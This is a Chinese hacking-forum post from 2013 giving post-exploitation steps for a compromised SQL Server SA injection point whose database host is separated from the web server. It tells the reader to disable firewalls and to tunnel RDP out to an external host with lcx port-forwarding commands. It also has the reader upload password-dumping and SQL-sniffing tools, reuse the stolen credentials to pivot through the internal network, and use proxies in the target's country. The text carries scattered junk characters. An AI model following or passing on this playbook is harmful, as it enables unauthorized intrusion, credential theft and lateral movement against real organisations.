找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2134|回复: 0
打印 上一主题 下一主题

SA权限网站和数据库分离的一些思路

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:46:01 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。( b- M9 n& j# l$ }* f$ e

0 S# g8 l4 }  l& h! @" ?1 F
  Q( a; j( F6 c( f+ P7 w4 m5 S/ o
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)1 t# O6 ^! v3 K* |
( Q- E# G* r9 Y' g1 l& V

( N5 ]' q9 u7 g7 m一、DB机有公网IP.
* L: ?: e7 Y  b/ l& Z' H. Q2 \8 l& m' j( X- ~6 U% N) {0 M
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
' z% r) M' t- p6 G( M  ?3 r4 Q; q
+ @* S6 J2 E8 W: u7 v& ^) X" E- j# H7 q6 P$ f
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
* B& q6 A, V$ x2 I, |! k
# z$ o9 T4 C/ A9 L9 J% m) }5 U" i. f# _' B! X+ o- F5 }
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
1 Y4 F' U2 |# V' [; l7 u3 _4 C7 c3 ]+ j/ R- n
2 T7 J: O* T0 s  `8 s
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
2 B7 g( k7 R. w5 J
* k- Y$ d! y* t* b7 N" A
" N/ g+ ~9 d7 ]2 q- V  h
4 Z- \( s* r  a二、DB机只有内网IP+ l0 h4 d, A8 }0 M

  o+ L+ H1 Z0 k& N/ b1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
  h  ]. A' z' {4 d0 n1 M3 k+ V9 y- a2 m- r4 k
; n: d! F& Z4 ~1 c
2:停掉防火墙和IP策略再从内往外扫描.) d8 L1 x3 U, M. A3 ]4 s# f

3 M; ?+ |8 [  T5 h6 y
5 Z/ i" y1 m5 w3 j3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
/ x- x3 C9 E: O9 T3 M3 ~
# B! p! ~7 n* n) D8 L6 s
3 r; U. i$ H/ k* D. @- M" O: \7 S4:学会密码规律分析往往会有惊喜.4 G  n4 g( I2 f9 ]4 ^9 w

( J$ y( Y  @- ^5 }. b$ M) c1 w$ T" c* |9 T7 n
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等& k0 F6 G' i. {" K* F

+ k0 v4 H$ ?! \5 b, \8 d. }7 D" f4 V' G
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表